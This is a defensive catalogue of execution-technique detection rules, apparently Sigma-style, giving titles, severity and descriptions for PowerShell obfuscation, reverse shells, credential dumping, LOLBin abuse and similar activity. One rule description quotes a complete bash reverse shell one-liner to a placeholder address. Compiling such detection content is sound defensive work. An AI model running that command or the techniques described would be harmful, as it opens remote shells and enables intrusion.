Invoke-Obfuscation Obfuscated IEX InvocationhighDetects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework (See reference section for code block)
Invoke-Obfuscation STDIN+ LauncherhighDetects Obfuscated use of stdin to execute PowerShell
Invoke-Obfuscation VAR+ LauncherhighDetects Obfuscated use of Environment Variables to execute PowerShell
Invoke-Obfuscation COMPRESS OBFUSCATIONmediumDetects Obfuscated Powershell via COMPRESS OBFUSCATION
Invoke-Obfuscation RUNDLL LAUNCHERmediumDetects Obfuscated Powershell via RUNDLL LAUNCHER
Invoke-Obfuscation Via StdinhighDetects Obfuscated Powershell via Stdin in Scripts
Invoke-Obfuscation Via Use CliphighDetects Obfuscated Powershell via use Clip.exe in Scripts
Invoke-Obfuscation Via Use MSHTAhighDetects Obfuscated Powershell via use MSHTA in Scripts
Invoke-Obfuscation Via Use Rundll32highDetects Obfuscated Powershell via use Rundll32 in Scripts
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATIONhighDetects Obfuscated Powershell via VAR++ LAUNCHER
File Creation by Office ApplicationshighThis rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.
Execution via CL_Invocation.ps1 (2 Lines)highDetects Execution via SyncInvoke in CL_Invocation.ps1 module
Execution via CL_Mutexverifiers.ps1 (2 Lines)highDetects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module
Files Dropped to Program Files by Non-Priviledged ProcessmediumSearch for dropping of files to Windows/Program Files fodlers by non-priviledged processes
attack.execution | 821
Title | Level | Description
OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd | high | Detects the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
iOS Implant URL Pattern | critical | Detects the URL pattern used by the iOS implant
Credential Dumping Tools Service Execution | critical | Detects the execution of well-known credential dumping tools via service execution events
PowerShell Scripts Run by a Services | high | Detects a PowerShell script installed as a service
Alternate PowerShell Hosts - Image | low | Detects alternate PowerShell hosts potentially bypassing detections that look for powershell.exe
Suspicious CLR Logs Creation | high | Detects suspicious .NET assembly executions. Could detect the use of Cobalt Strike's execute-assembly command.
Windows Management Instrumentation DLL Loaded Via Microsoft Word | informational | Detects DLLs loaded via Word containing VBA macros executing WMI commands
PsExec Pipes Artifacts | medium | Detects use of PsExec via pipe creation/access to pipes
Dnscat Execution | critical | Detects Dnscat exfiltration tool execution
Suspicious PowerShell Download | medium | Detects suspicious PowerShell download commands
Suspicious PowerShell Invocations - Generic | high | Detects suspicious PowerShell invocation command parameters
Suspicious PowerShell Invocations - Specific | high | Detects suspicious PowerShell invocation command parameters
APT29 | high | This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks.
Lazarus Activity Apr21 | high | Detects different process creation events as described in Malwarebytes' threat report on Lazarus group activity
Lazarus Loaders | critical | Detects different loaders as described in various threat reports on Lazarus group activity
TA505 Dropper Load Pattern | critical | Detects mshta loaded with wmiprvse as parent, as used by TA505 malicious documents
Read and Execute a File Via Cmd.exe | medium | Detects use of "/R <" to read and execute a file via cmd.exe
Visual Basic Script Execution | medium | Adversaries may abuse Visual Basic (VB) for execution
Execution via MSSQL Xp_cmdshell Stored Procedure | high | Detects execution via the MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default.
Invoke-Obfuscation RUNDLL LAUNCHER | medium | Detects obfuscated PowerShell via RUNDLL LAUNCHER
Invoke-Obfuscation Via Use Rundll32 | high | Detects obfuscated PowerShell via use of Rundll32 in scripts
New Lolbin Process by Office Applications | high | This rule monitors any Office app that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated.
Monitoring Wuauclt.exe For Lolbas Execution Of DLL | medium | Adversaries can abuse wuauclt.exe (Windows Update client) to achieve code execution by specifying an arbitrary DLL.
Ryuk Ransomware Command Line Activity | critical | Detects Ryuk ransomware command lines
Excel Proxy Executing Regsvr32 With Payload | high | Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break the suspicious parent-child chain (Office app spawns LOLBin). But we have the command line in the event, which allows us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in the command line with parent Office application processes.
Excel Proxy Executing Regsvr32 With Payload Alternate | high | Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break the suspicious parent-child chain (Office app spawns LOLBin). But we have the command line in the event, which allows us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in the command line with parent Office application processes.
Office Applications Spawning Wmi Cli Alternate | high | Initial execution of a malicious document calls wmic to execute the file with regsvr32
PowerShell AMSI Bypass Pattern | high | Detects attempts to disable AMSI in the command line. It is possible to bypass AMSI by disabling it before loading the main payload.
Base64 Encoded Listing of Shadowcopy | high | Detects base64 encoded listing of Win32_Shadowcopy
Malicious Base64 Encoded Powershell Invoke Cmdlets | high | Detects base64 encoded PowerShell cmdlet invocation of known suspicious cmdlets
Potential Xor Encoded PowerShell Command | medium | Detects usage of "xor" or "bxor" in combination with a "foreach" loop. This pattern is often found in encoded PowerShell code and commands as a way to avoid detection
Renamed PaExec Execution | medium | Detects execution of renamed paexec via imphash and executable product string
Suspicious Add Scheduled Task From User AppData Temp | high | Detects schtasks.exe creating a task from the user's AppData\Local\Temp
Suspicious Execution of Sc to Delete AV Services | high | Detects when attackers use "sc.exe" to delete AV services from the system in order to avoid detection
Suspicious Cmd Execution via WMI | medium | Detects suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement.
Wscript Execution from Non C Drive | medium | Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.
Process Start From Suspicious Folder | low | Detects process starts from rare or uncommon folders like the temporary folder or folders that usually don't contain executable files
Squirrel Lolbin | medium | Detects possible use of the Squirrel package manager as a LOLBin
PsExec Tool Execution | low | Detects PsExec service execution via the default service image name
PsExec Service Start | low | Detects a PsExec service start
WMI Execution Via Office Process | medium | Initial execution of a malicious document calls wmic to execute the file with regsvr32
WMI Remote Command Execution | medium | An adversary might use WMI to execute commands on a remote system
WMI Reconnaissance List Remote Services | medium | An adversary might use WMI to check if a certain remote service is running on a remote device. When the test completes, the service information will be displayed on the screen if it exists. A common feedback message is "No instance(s) Available" if the service queried is not running. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable
Adwind RAT / JRAT - Registry | high | Detects javaw.exe in the AppData folder as used by Adwind / JRAT
PowerShell Execution | medium | Detects execution of PowerShell
Lateral Movement Indicator ConDrv | low | This event was observed on the target host during lateral movement. The process name within the event contains the process spawned post compromise. The Account Name within the event contains the compromised user account name. This event should be correlated with 4624 and 4688 for further intrusion context.
Suspicious Esentutl Use | high | Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance.
Kubernetes CronJob/Job Modification | medium | Detects when a Kubernetes CronJob or Job is created or modified. A Kubernetes Job creates one or more pods to accomplish a specific task, and a CronJob creates Jobs on a recurring schedule. An adversary can take advantage of this Kubernetes object to schedule Jobs to run containers that execute malicious code within a cluster, allowing them to achieve persistence.
Antivirus Exploitation Framework Detection | critical | Detects a highly relevant antivirus alert that reports an exploitation framework. This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.
Antivirus Hacktool Detection | high | Detects a highly relevant antivirus alert that reports a hack tool or other attack tool. This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.
AWS EC2 Startup Shell Script Change | high | Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.
AWS IAM S3Browser Templated S3 Bucket Policy Creation | high | Detects the S3 Browser utility creating an inline IAM policy containing the default S3 bucket name placeholder value of "".
AWS IAM S3Browser LoginProfile Creation | high | Detects the S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined, then (when found) creating a LoginProfile.
AWS IAM S3Browser User or AccessKey CreationhighDetects S3 Browser utility creating IAM User or AccessKey.
Azure Kubernetes CronJobmediumIdentifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
Azure New CloudShell CreatedmediumIdentifies when a new cloudshell is created inside of Azure portal.
Google Cloud Kubernetes CronJobmediumIdentifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
BPFDoor Abnormal Process ID or Lock File Accessedhighdetects BPFDoor .lock and .pid files access in temporary file storage facility
Suspicious Commands LinuxmediumDetects relevant commands often related to malware or hacking activity
Equation Group IndicatorshighDetects suspicious shell commands used in various Equation Group scripts and tools
Suspicious Activity in Shell CommandshighDetects suspicious shell commands used in various exploit codes (see references)
Suspicious Reverse Shell Command LinehighDetects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell
Space After FilenamelowDetects space after filename
JexBoss Command SequencehighDetects suspicious command sequence that JexBoss
Symlink Etc PasswdhighDetects suspicious command lines that look as if they would create symbolic links to /etc/passwd
Linux Reverse Shell IndicatorcriticalDetects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
Suspicious Invocation of Shell via AWK - LinuxhighDetects the execution of "awk" or it's sibling commands, to invoke a shell using the system() function. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
Bash Interactive ShelllowDetects execution of the bash shell with the interactive flag "-i".
BPFtrace Unsafe Option UsagemediumDetects the usage of the unsafe bpftrace option
Enable BPF Kprobes TracingmediumDetects common command used to enable bpf kprobes tracing
Capsh Shell Invocation - LinuxhighDetects the use of the "capsh" utility to invoke a shell.
Atlassian Confluence CVE-2022-26134 | high | Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
Shell Invocation via Env Command - Linux | high | Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.
ESXi Admin Permission Assigned To Account Via ESXCLI | high | Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account.
ESXi VM Kill Via ESXCLI | medium | Detects execution of the "esxcli" command with the "vm" and "kill" flags in order to kill/shutdown a specific VM.
Shell Execution via Git - Linux | high | Detects the use of the "git" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or breaking out from restricted environments.
Named Pipe Created Via Mkfifo | low | Detects the creation of a new named pipe using the "mkfifo" utility
Potentially Suspicious Named Pipe Created Via Mkfifo | medium | Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location
Potential Netcat Reverse Shell Execution | high | Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup.
Nohup Execution | medium | Detects usage of nohup, which could be leveraged by an attacker to keep a process running or break out from restricted environments
Suspicious Nohup Execution | high | Detects execution of binaries located in potentially suspicious locations via "nohup"
OMIGOD SCX RunAsProvider ExecuteScript | high | Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. The script being executed gets created as a temp file in the /tmp folder with a scx* prefix. Then it is invoked from the following directory: /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
OMIGOD SCX RunAsProvider ExecuteShellCommand | high | Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
Potential Perl Reverse Shell Execution | high | Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity
Potential PHP Reverse Shell | high | Detects usage of the PHP CLI with the "-r" flag, which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function, which allows the creation of sockets. Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection.
Python Spawning Pretty TTY Via PTY Module | medium | Detects a python process calling the PTY module in order to spawn a pretty tty, which could be indicative of potential reverse shell activity.
Python Reverse Shell Execution Via PTY And Socket Modules | high | Detects the execution of python with calls to the socket and pty modules in order to connect and spawn a potential reverse shell.
Inline Python Execution - Spawn Shell Via OS System Library | high | Detects execution of inline Python code via the "-c" flag in order to call the "system" function from the "os" library and spawn a shell.
Shell Execution via Rsync - Linux | high | Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or breaking out from restricted environments.
Suspicious Invocation of Shell via Rsync | high | Detects the execution of a shell as a sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
Potential Ruby Reverse Shell | medium | Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to set up a reverse shell
Scheduled Cron Task/Job - Linux | medium | Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
Shell Invocation Via Ssh - Linux | high | Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or breaking out from restricted environments.
Linux HackTool Execution | high | Detects known hacktool execution based on image name.
Interactive Bash Suspicious Children | medium | Detects suspicious interactive bash as a parent to rather uncommon child processes
Suspicious Java Children Processes | high | Detects a java process spawning suspicious children
Execution Of Script Located In Potentially Suspicious Directory | medium | Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc.
Shell Execution Of Process Located In Tmp Directory | high | Detects execution of shells from a parent process located in a temporary (/tmp) directory
Potential Xterm Reverse Shell | medium | Detects usage of "xterm" as a potential reverse shell tunnel
MacOS Scripting Interpreter AppleScript | medium | Detects execution of AppleScript, the macOS scripting language.
Clipboard Data Collection Via OSAScript | high | Detects possible collection of data from the clipboard via execution of the osascript binary
Suspicious Installer Package Child Process | medium | Detects the execution of suspicious child processes from a macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters
JAMF MDM Potential Suspicious Child Process | medium | Detects potential suspicious child processes of "jamf". Could be a sign of potential abuse of Jamf as a C2 server as seen by Typhon MythicAgent.
JAMF MDM Execution | low | Detects execution of the "jamf" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control policies.
JXA In-memory Execution Via OSAScript | high | Detects possible malicious execution of JXA in-memory via OSAScript
Launch Agent/Daemon Execution Via Launchctl | medium | Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS.
Suspicious Microsoft Office Child Process - MacOS | high | Detects suspicious child processes spawning from Microsoft Office suite applications such as Word or Excel. This could indicate malicious macro execution
OSACompile Run-Only Execution | high | Detects potential suspicious run-only executions compiled using OSACompile
Payload Decoded and Decrypted via Built-in Utilities | medium | Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.
Scheduled Cron Task/Job - MacOs | medium | Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
Osacompile Execution By Potentially Suspicious Applet/Osascript | medium | Detects a potentially suspicious applet or osascript executing "osacompile".
Suspicious Browser Child Process - MacOS | medium | Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation.
Suspicious Execution via macOS Script Editor | medium | Detects when the macOS Script Editor utility spawns an unusual child process.
Potential In-Memory Download And Compile Of Payloads | medium | Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware
MITRE BZAR Indicators for Execution | medium | Windows DCE-RPC functions which indicate execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE
Possible PrintNightmare Print Driver Install | medium | Detects the remote installation of a print driver, which is a possible indication of the exploitation of PrintNightmare (CVE-2021-1675). The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally or through group policy.
DNS Events Related To Mining Pools | low | Identifies clients that may be performing DNS lookups associated with common currency mining pools.
OMIGOD HTTP No Authentication RCE | high | Detects the exploitation of OMIGOD (CVE-2021-38647), which allows remote code execution (RCE) as root with just a single unauthenticated HTTP request. Verify successful exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.
Download From Suspicious TLD - Blacklist | low | Detects download of certain file types from hosts in suspicious TLDs
Download From Suspicious TLD - Whitelist | low | Detects executable downloads from suspicious remote systems
Flash Player Update from Suspicious Location | high | Detects a flashplayer update from an unofficial location
F5 BIG-IP iControl Rest API Command Execution - Webserver | medium | Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP
Dump Ntds.dit To Suspicious Location | medium | Detects potential abuse of ntdsutil to dump the ntds.dit database to a suspicious location
Audit CVE Event | critical | Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability). Unfortunately, that is about the only instance of CVEs being written to this log.
MSI Installation From Suspicious Locations | medium | Detects MSI package installation from suspicious locations
MSSQL XPCmdshell Suspicious Execution | high | Detects when the MSSQL "xp_cmdshell" stored procedure is used to execute commands
MSSQL XPCmdshell Option Change | high | Detects when the MSSQL "xp_cmdshell" stored procedure setting is changed.
Remote Access Tool - ScreenConnect Command Execution | low | Detects command execution via ScreenConnect RMM
Remote Access Tool - ScreenConnect File Transfer | low | Detects a file being transferred via ScreenConnect RMM
File Was Not Allowed To Run | medium | Detects execution attempts of files that were not allowed to run. AppLocker is a very useful tool, especially on servers where unprivileged users have access, for example terminal servers. You need to configure AppLocker and log collection to receive these events.
Sysinternals Tools AppX Versions Execution | low | Detects execution of Sysinternals tools via an AppX package. Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths
Suspicious Digital Signature Of AppX Package | medium | Detects execution of AppX packages with a known suspicious or malicious signature
CodeIntegrity - Unmet Signing Level Requirements By File Under Validation | low | Detects attempted file load events that did not meet the signing level requirements. It often means the file's signature is revoked or a signature with the Lifetime Signing EKU has expired. This event is best correlated with EID 3089 to determine the error of the validation.
Loading Diagcab Package From Remote Path | high | Detects loading of diagcab packages from a remote path, as seen in the DogWalk vulnerability
Hacktool Ruler | high | Detects events that are generated when using the hacktool Ruler by Sensepost
CobaltStrike Service Installations - Security | high | Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement
Invoke-Obfuscation CLIP+ Launcher - Security | high | Detects obfuscated use of Clip.exe to execute PowerShell
Invoke-Obfuscation STDIN+ Launcher - Security | high | Detects obfuscated use of stdin to execute PowerShell
Invoke-Obfuscation VAR+ Launcher - Security | high | Detects obfuscated use of environment variables to execute PowerShell
Invoke-Obfuscation COMPRESS OBFUSCATION - Security | medium | Detects obfuscated PowerShell via COMPRESS OBFUSCATION
Invoke-Obfuscation RUNDLL LAUNCHER - Security | medium | Detects obfuscated PowerShell via RUNDLL LAUNCHER
Invoke-Obfuscation Via Stdin - Security | high | Detects obfuscated PowerShell via stdin in scripts
Invoke-Obfuscation Via Use Clip - Security | high | Detects obfuscated PowerShell via use of Clip.exe in scripts
Invoke-Obfuscation Via Use MSHTA - Security | high | Detects obfuscated PowerShell via use of MSHTA in scripts
Invoke-Obfuscation Via Use Rundll32 - Security | high | Detects obfuscated PowerShell via use of Rundll32 in scripts
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security | high | Detects obfuscated PowerShell via VAR++ LAUNCHER
Credential Dumping Tools Service Execution - Security | high | Detects well-known credential dumping tools execution via service execution events
Metasploit Or Impacket Service Installation Via SMB PsExec | high | Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on a specific service installation
PowerShell Scripts Installed as Services - Security | high | Detects a PowerShell script installed as a service
Remote PowerShell Sessions Network Connections (WinRM) | high | Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986
Suspicious Scheduled Task Creation | high | Detects suspicious scheduled task creation events, based on attributes such as paths, command line flags, etc.
Important Scheduled Task Deleted/Disabled | high | Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities
Suspicious Scheduled Task Update | high | Detects updates to scheduled task events that contain suspicious keywords.
T1047 Wmiprvse Wbemcomn DLL Hijack | high | Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network for a WMI DLL Hijack scenario.
Successful Account Login Via WMI | low | Detects successful logon attempts performed with WMI
Suspicious Application Installed | medium | Detects a suspicious application installed by looking at the added shortcut to the app resolver cache
Local Privilege Escalation Indicator TabTip | high | Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode
Suspicious Usage of CVE_2021_34484 or CVE 2022_21919 | low | During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (possibly many false positives with this event) are created. Moreover, it appears the directory \Users\TEMP may be created during the exploitation. Viewed on 2008 Server
CobaltStrike Service Installations - System | critical | Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement
smbexec.py Service Installation | high | Detects the use of the smbexec.py tool by detecting a specific service installation
Invoke-Obfuscation CLIP+ Launcher - System | high | Detects obfuscated use of Clip.exe to execute PowerShell
Invoke-Obfuscation STDIN+ Launcher - System | high | Detects obfuscated use of stdin to execute PowerShell
Invoke-Obfuscation VAR+ Launcher - System | high | Detects obfuscated use of environment variables to execute PowerShell
Invoke-Obfuscation COMPRESS OBFUSCATION - System | medium | Detects obfuscated PowerShell via COMPRESS OBFUSCATION
Invoke-Obfuscation Via Stdin - System | high | Detects obfuscated PowerShell via stdin in scripts
Invoke-Obfuscation RUNDLL LAUNCHER - System | medium | Detects obfuscated PowerShell via RUNDLL LAUNCHER
Invoke-Obfuscation Via Use Clip - System | high | Detects obfuscated PowerShell via use of Clip.exe in scripts
Invoke-Obfuscation Via Use MSHTA - System | high | Detects obfuscated PowerShell via use of MSHTA in scripts
Invoke-Obfuscation Via Use Rundll32 - System | high | Detects obfuscated PowerShell via use of Rundll32 in scripts
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System | high | Detects obfuscated PowerShell via VAR++ LAUNCHER
Credential Dumping Tools Service Execution - System | high | Detects well-known credential dumping tools execution via service execution events
PowerShell Scripts Installed as Services | high | Detects a PowerShell script installed as a service
CSExec Service Installation | medium | Detects CSExec service installation and execution events
HackTool Service Registration or Execution | high | Detects installation or execution of services
PAExec Service Installation | medium | Detects PAExec service installation
ProcessHacker Privilege Elevation | high | Detects a ProcessHacker tool that elevated privileges to a very high level
RemCom Service Installation | medium | Detects RemCom service installation and execution events
Sliver C2 Default Service Installation | high | Detects known malicious service installations that appear in cases in which Sliver implants execute the PsExec commands
PsExec Service Installation | medium | Detects PsExec service installation and execution events
PSExec and WMI Process Creations Block | high | Detects blocking of process creations originating from PSExec and WMI commands
Windows Defender AMSI Trigger Detected | high | Detects triggering of AMSI by Windows Defender.
Windows Defender Threat Detected | high | Detects actions taken by Windows Defender malware detection engines
HackTool - CACTUSTORCH Remote Thread Creation | high | Detects remote thread creation from CACTUSTORCH as described in references.
Remote Thread Creation Via PowerShell In Uncommon Target | medium | Detects the creation of a remote thread from a PowerShell process in an uncommon target process
DNS Query Request By Regsvr32.EXE | medium | Detects DNS queries initiated by "Regsvr32.exe"
Assembly DLL Creation Via AspNetCompiler | medium | Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider.
BloodHound Collection Files | high | Detects default file names output by the BloodHound collection tool SharpHound
WScript or CScript Dropper - File | high | Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe
CSExec Service File Creation | medium | Detects the default CSExec service filename, which indicates CSExec service installation and execution
Adwind RAT / JRAT File Artifact | high | Detects javaw.exe in AppData folder as used by Adwind / JRAT
Suspicious File Creation In Uncommon AppData Folder | high | Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Roaming, LocalLow). This method could be used to bypass detections that exclude the AppData folder for fear of FPs
PCRE.NET Package Temp Files | high | Detects processes creating temp files related to the PCRE.NET package
File With Uncommon Extension Created By An Office Application | high | Detects the creation of files with an executable or script extension by an Office application.
Suspicious File Created In PerfLogs | medium | Detects suspicious files, based on their extension, being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files
Malicious PowerShell Scripts - FileCreation | high | Detects the creation of known offensive PowerShell scripts used for exploitation
RemCom Service File Creation | medium | Detects the default RemCom service filename, which indicates RemCom service installation and execution
Remote Access Tool - ScreenConnect Temporary File | low | Detects the creation of files in a specific location by ScreenConnect RMM. ScreenConnect has a feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" before execution.
Windows Shell/Scripting Application File Write to Suspicious Folder | high | Detects Windows shells and scripting applications that write files to suspicious folders
Created Files by Microsoft Sync Center | medium | This rule detects suspicious files created by Microsoft Sync Center (mobsync)
Potential File Extension Spoofing Using Right-to-Left Override | high | Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extension.
Suspicious Scheduled Task Write to System32 Tasks | high | Detects the creation of tasks from processes executed from suspicious locations
Suspicious Interactive PowerShell as SYSTEM | high | Detects the creation of files that indicate interactive use of PowerShell in the SYSTEM user context
WinSxS Executable File Creation By Non-System Process | medium | Detects the creation of binaries in the WinSxS folder by non-system processes
PsExec Service File Creation | low | Detects the default PsExec service filename, which indicates PsExec service installation and execution
PSEXEC Remote Execution File Artefact | high | Detects creation of the PSEXEC key file, which is created any time a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
UAC Bypass Using IDiagnostic Profile - File | high | Detects the creation of a file by "dllhost.exe" in the System32 directory as part of the "IDiagnosticProfileUAC" UAC bypass technique
Wmiprvse Wbemcomn DLL Hijack - File | critical | Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
PCRE.NET Package Image Load | high | Detects processes loading modules related to the PCRE.NET package
PowerShell Core DLL Loaded By Non PowerShell Process | medium | Detects loading of essential DLLs used by PowerShell by a non-PowerShell process. Detects behavior similar to meterpreter's "load powershell" extension.
CLR DLL Loaded Via Office Applications | medium | Detects a CLR DLL being loaded by an Office product
DotNET Assembly DLL Loaded Via Office Application | medium | Detects any assembly DLL being loaded by an Office product
Active Directory Parsing DLL Loaded Via Office Application | medium | Detects the DSParse DLL being loaded by an Office product
GAC DLL Loaded Via Office Applications | high | Detects any GAC DLL being loaded by an Office product
Microsoft Excel Add-In Loaded From Uncommon Location | medium | Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location
Active Directory Kerberos DLL Loaded Via Office Application | medium | Detects the Kerberos DLL being loaded by an Office product
Microsoft VBA For Outlook Addin Loaded Via Outlook | medium | Detects the outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process
VBA DLL Loaded Via Office Application | high | Detects VB DLLs loaded by an Office application, which could indicate the presence of VBA macros.
Remote DLL Load Via Rundll32.EXE | medium | Detects a remote DLL load event via "rundll32.exe".
Abusable DLL Potential Sideloading From Suspicious Location | high | Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations
DotNet CLR DLL Loaded By Scripting Applications | high | Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potentially suspicious execution.
Wmiprvse Wbemcomn DLL Hijack | high | Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
Suspicious WSMAN Provider Image Loads | medium | Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.
Outbound Network Connection Initiated By Microsoft Dialer | high | Detects an outbound network connection initiated by Microsoft Dialer. The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer. This is an outdated process in the current context of its usage and is a common target for info stealers for process injection, and is used to make C2 connections; a common example is "Rhadamanthys"
Network Connection Initiated By Eqnedt32.EXE | high | Detects network connections from the Equation Editor process "eqnedt32.exe".
Network Connection Initiated Via Notepad.EXE | high | Detects a network connection that is initiated by the "notepad.exe" process. This might be a sign of process injection from a beacon process or something similar. Notepad rarely initiates network communication except when printing documents, for example.
Office Application Initiated Network Connection To Non-Local IP | medium | Detects an Office application (Word, Excel, PowerPoint) that initiates a network connection to a non-private IP address. This rule aims to detect traffic similar to that seen exploited in CVE-2021-42292. This rule will require an initial baseline and tuning that is specific to your organization.
Silenttrinity Stager Msbuild Activity | high | Detects possible remote connections to Silenttrinity C2
